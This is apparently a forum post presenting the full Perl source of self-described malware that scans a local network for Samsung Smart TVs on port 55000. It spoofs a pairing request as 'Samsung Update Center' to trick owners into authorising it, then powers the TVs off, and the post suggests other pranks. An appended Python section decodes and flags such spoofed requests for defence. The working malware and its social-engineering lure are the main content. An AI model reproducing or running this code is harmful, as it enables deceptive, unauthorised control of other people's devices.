[+]Topic: Code
[+]By: Perforin

XOS.TeVil.Perl is malware that scans the network for connected
Samsung TVs with Smart TV. Every connected TV with this feature lets
you control it remotely. If it finds a target, it sends its auth request
to the TV. I searched for a method which would bypass this request but
could not find anything. The TV wants to save your MAC address but that
is not 100% correct. You can send any string to the TV which will be
taken as a password. I tried to use the TV's MAC address, empty strings,
strings with a Joker sign, null bytes, the TV's manufacturer name, the
broadcast address... unfortunately this still requires user interaction.

That's why we have to use some social engineering. The malware tells the
user that the request comes from "Samsung Update Center".

After the user authorizes our script it will simply shut down the TV. Of
course you could do some other things like switching channels... maybe
to some porn? Or mute the TV. Raise the volume to maximum. If you are
interested you should check this: DeviceAPI Guide for Samsung Smart TV



#!/usr/bin/env perl

=pod

XOS.TeVil.Perl.Perforin-vxnetw0rk

XOS.TeVil.Perl is malware that scans the network for connected
Samsung TVs with Smart TV. Every connected TV with this feature lets
you control it remotely. If it finds a target, it sends its auth request
to the TV. I searched for a method which would bypass this request but
could not find anything. The TV wants to save your MAC address but that
is not 100% correct. You can send any string to the TV which will be
taken as a password. I tried to use the TV's MAC address, empty strings,
strings with a Joker sign, null bytes, the TV's manufacturer name,
the broadcast address... unfortunately this still requires user interaction.

That's why we have to use some social engineering. The malware tells the
user that the request comes from "Samsung Update Center".

After the user authorizes our script it will simply shut down the TV.

coded by Perforin [vxnetw0rk]

=cut

use IO::Socket;
use MIME::Base64;

#### local ip address routine ##########################################
my $sock = new IO::Socket::INET (
    PeerAddr => "173.194.67.138",
    PeerPort => 80,
    Proto    => 'tcp'
);
my $localip = $sock->sockhost;
close $sock;
########################################################################

#print "Local IP: " . $localip; # DEBUG

$range = $localip =~ /(\d+\.\d+\.\d+\.)(\d+)/;
$to_scan = $1;

#print "\nScanning range: " . $to_scan . "\n"; # DEBUG

while (1) {
    scan_network();
    sleep 300; # Scan every 5 minutes
}

#### Scanning local network ############################################
sub scan_network {
    for (0..255) {
        my $sock = new IO::Socket::INET (
            PeerAddr => $to_scan . $_,
            PeerPort => 55000,
            Proto    => 'tcp',
            Timeout  => 0.5
        );
        #print "Scanning " . $to_scan . $_ . "\n"; # DEBUG
        if ($sock) {
            #print $to_scan . $_ . " is a Samsung TV!\n"; # DEBUG
            $to_pwn = $to_scan . $_;
            pwn_it($to_pwn);
        }
        close($sock);
    }
}
########################################################################

#### pwning routine ####################################################
sub pwn_it {
    $ip = shift;
    #print "Pwning $ip !\n"; # DEBUG
    my $sock = new IO::Socket::INET (
        PeerAddr => $ip,
        PeerPort => 55000,
        Proto    => 'tcp',
    );

    my $mymac       = "FF-FF-FF-FF-FF-FF"; # Is not checking MAC format. Could be any string and the TV wouldn't mind :)
    my $appstring   = "iphone..iapp.samsung"; # Some spoofing going on here
    my $tvappstring = "iphone.BringVXheavensBack.iapp.samsung";
    my $remotename  = "Samsung Update Center";

    my $msg1 = chr(0x64) . chr(0x00)
             . chr(length(encode_base64($localip))) . chr(0x00) . encode_base64($localip)
             . chr(length(encode_base64($mymac))) . chr(0x00) . encode_base64($mymac)
             . chr(length(encode_base64($remotename))) . chr(0x00) . encode_base64($remotename);
    my $part1 = chr(0x00) . chr(length($appstring)) . chr(0x00) . $appstring
              . chr(length($msg1)) . chr(0x00) . $msg1;
    print $sock $part1;

    my $msg2 = chr(0xc8) . chr(0x00);
    my $part2 = chr(0x00) . chr(length($appstring)) . chr(0x00) . $appstring
              . chr(length($msg2)) . chr(0x00) . $msg2;
    print $sock $part2;

    my $key = "KEY_" . "POWEROFF";
    my $msg3 = chr(0x00) . chr(0x00) . chr(0x00)
             . chr(length(encode_base64($key))) . chr(0x00) . encode_base64($key);
    my $part3 = chr(0x00) . chr(length($tvappstring)) . chr(0x00) . $tvappstring
              . chr(length($msg3)) . chr(0x00) . $msg3;
    print $sock $part3;
}
########################################################################
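
As an added example (not part of the original post or the author's script), a passive decoder in Python for the pairing message laid out in the script above, of the kind a monitor on the TV's network segment could apply to payloads seen on TCP port 55000. Reading each length byte plus 0x00 as one 16-bit little-endian length, the function names, the sample addresses and the three checks are assumptions of this example.

```python
import base64
import re
import struct

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}[-:]){5}[0-9A-Fa-f]{2}$")

def _field(buf, off):
    """Read one field: 16-bit little-endian length, then that many bytes."""
    (n,) = struct.unpack_from("<H", buf, off)
    end = off + 2 + n
    if end > len(buf):
        raise ValueError("truncated field")
    return buf[off + 2:end], end

def parse_auth(payload):
    """Decode a pairing request sent to TCP/55000; None if it is not one."""
    try:
        if payload[:1] != b"\x00":
            return None
        app, off = _field(payload, 1)
        body, _ = _field(payload, off)
        if body[:2] != b"\x64\x00":
            return None
        vals, off = [], 2
        for _ in range(3):  # claimed IP, device id, display name
            raw, off = _field(body, off)
            vals.append(base64.b64decode(raw).decode("utf-8", "replace"))
    except (struct.error, ValueError):
        return None
    return dict(zip(("ip", "id", "name"), vals), app=app.decode("latin-1"))

def findings(payload, src_ip, paired_names):
    """Heuristic checks (assumptions of this example, not vendor rules)."""
    req = parse_auth(payload)
    if req is None:
        return []
    out = []
    if req["name"] not in paired_names:
        out.append("unrecognised remote name: " + req["name"])
    if req["ip"] != src_ip:
        out.append("claimed IP does not match source address")
    if not MAC_RE.match(req["id"]) or set(req["id"]) <= set("Ff-:"):
        out.append("implausible device id: " + req["id"])
    return out

# Constructed sample, laid out like the first message in the script above.
_lp = lambda b: struct.pack("<H", len(b)) + b
_b64 = lambda s: _lp(base64.encodebytes(s.encode()))
SAMPLE = b"\x00" + _lp(b"iphone..iapp.samsung") + _lp(
    b"\x64\x00" + _b64("192.0.2.10") + _b64("FF-FF-FF-FF-FF-FF") + _b64("Samsung Update Center"))
```

The display name is chosen entirely by the sender, so the on-screen prompt is not evidence of who is asking; comparing it against the names of remotes the household has actually paired is what exposes a label such as "Samsung Update Center".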